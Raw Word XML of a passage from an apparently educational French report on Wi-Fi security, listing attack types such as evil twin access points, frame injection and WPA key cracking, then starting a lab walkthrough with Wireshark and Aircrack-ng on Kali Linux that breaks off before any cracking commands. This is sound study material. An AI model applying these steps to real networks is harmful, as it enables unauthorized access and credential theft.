      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DF8096" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0354F4EE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Attaques de confidentialité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Interception du trafic sur le réseau sans fil </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D44FA71" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A48B2CC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Evil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Twin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> AP </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: point d’accès malveillant qui se fait passer pour un point d’accès légitime pour le vol d’authentification. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FFFC53" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747FC92D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Faux portails</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : création </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>d’un faux portails</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de connexion pour vols de données d'authentification. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6555B90F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A95C14" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Attaques d'intégrité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : utilisation de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fausses trame</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour tromper le destinataire, elles peuvent également être utilisées pour réaliser une attaque par déni de service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103E26C3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B61C2DC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Les attaques par rejeu Radius</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Techniques utilisées “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sniffing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et interception”, les authentificateurs de requêtes, les identificateurs et les réponses du serveur peuvent être capturés et stockés pour analyse. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307D385B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE7CB02" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Attaques par injection de trames </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: manipulation de trame pour forcer une trame de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>désauthentification</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> à se ré authentifier afin que la poignée de main puisse être capturée </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D63DE4D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="134F5C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B53E9E4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="134F5C"/>
        </w:rPr>
        <w:t xml:space="preserve">Attaques </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="134F5C"/>
        </w:rPr>
        <w:t>d’authentification</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vols d’informations d’authentification </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40B955" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07129BC5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Craquage de clés WEP / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>wpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> WPA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : capture des poignées de main d’authentification et attaque par force brute hors ligne pour trouver la clé </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEE7648" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A3C9E52" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Attaques de déclassement </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Attaque utilisée contre le standard x en forçant le serveur à offrir une authentification plus faible à </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>l’aide  de</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> faux paquets EAP (paquets d’authentification) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7292747F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="778C1BA0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550CD41E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_6qu2yfxcv2g5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="68325AA3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6ECC13F3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="26265155" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="270AEDB1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="694D6189" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="58A3B47D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1B4FF295" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="651A096E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="32E8AFDB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="23AF37CE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="13FCAC1C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_xj86zlo1d9g7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="64"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 2 - Outils de pénétration et d’analyse de réseau sans file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F637294" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="052F91C1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : C’est un logiciel libre et gratuit. Il est utilisé dans le dépannage et l’analyse de réseaux informatiques, le développement de protocoles, l’éducation et la rétroingénierie. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF74181" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0498A1AC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_het6ghgmlb1k" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="65"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - Lancement de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7EF29D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172E548B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>On sélectionne les cartes réseau voulue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E145D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="22E8B37C" wp14:editId="543A6121">
            <wp:extent cx="4700588" cy="2235125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8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4700588" cy="2235125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="051012A6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Voici un exemple des trames :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A81C22" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5EAD1AF5" wp14:editId="31F01F64">
            <wp:extent cx="4895850" cy="1724025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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4895850" cy="1724025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="504C162C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11FB7D50" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">On va voir s’il y’a des paquets d’authentification qui ont </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>transiter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur le réseau avec le filtre « </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eapol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> »</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78032C0B" w14:textId="77777777" w:rsidR="00223B7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F118DE" wp14:editId="3353D8D0">
            <wp:extent cx="5731200" cy="850900"/>
            <wp:effectExtent l="0" t="0" r="0"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731200" cy="850900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBD94DD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nous n’avons </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rien ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> si nous lançons la capture sur le réseau du CCI nous aurons également aucun paquets </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eapol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> car c’est un réseau fermé avec un portail captif.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0004A74C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_nzjwtj7sqjdj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="66"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">2 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>Aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D92CD40" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    Classé une clé Wap2 sur un réseau wifi avec la suite </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aircrack-ng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13D8E466" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_pgo2ghzg7ojx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">1 – installer un adaptateur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>Wlan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur la plateforme KALI Linux ne spas activer un réseau WIFI sur la carte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BEDDB9" w14:textId="77777777" w:rsidR="00223B72"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B16713" wp14:editId="5ACC10A1">
            <wp:extent cx="6129338" cy="2855714"/>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129338" cy="2855714"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4CAC50" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B7B7C69" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_qtujwb6mim5m" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="68"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>2 – Contrôle des connexions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B60C8F1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">On peut voir que la carte réseau WLAN est présente mais que aucun réseau n’est monté. La dans notre cas, on ne voit pas le réseau </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wlan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B09CF0B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5258BED3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_wiqt7lljj8fh" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3 – Contrôle des fonctionner des cartes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319D78B9" w14:textId="77777777" w:rsidR="00223B72"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A6CA53" wp14:editId="56ACCA30">
            <wp:extent cx="2466975" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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2466975" cy="971550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D2368" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">On vérifier les cartes WIFI avec « </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iwconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> »</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB40A39" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F90474" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_au227o9lhdax" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">4 - Arrêter des gestionnaire de réseau </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>( protocole</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve"> d’authentification ) désactiver le monde de contrôle</w:t>
